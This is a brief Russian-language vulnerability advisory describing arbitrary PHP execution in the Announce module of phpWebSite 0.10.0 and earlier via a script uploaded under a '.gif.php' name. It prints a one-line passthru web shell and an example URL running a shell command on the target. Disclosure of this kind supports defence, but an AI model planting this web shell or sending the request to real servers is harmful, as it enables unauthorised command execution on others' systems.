Программа: phpWebSite 0.10.0 и более ранние версии

Обнаруженная уязвимость позволяет
удаленному пользователю выполнить
произвольный php сценарий на уязвимом
сервере. Уязвимость обнаружена в модуле
Announce при обработке gif файлов. Удаленный
пользователь с привилегиями на загрузку
файлов и публикацию анонсов может
выполнить произвольный php сценарий на
сервере. Удаленный пользователь может
выдать php сценарий за gif файл ([anyname].gif.php),
содержащий следующие строки и выполнить
произвольные команды на системе:

<?passthru($_GET[nst]);?>

Пример:

http://[target]/images/announce/[anyname].gif.php?nst=ls –la



Оставить мнение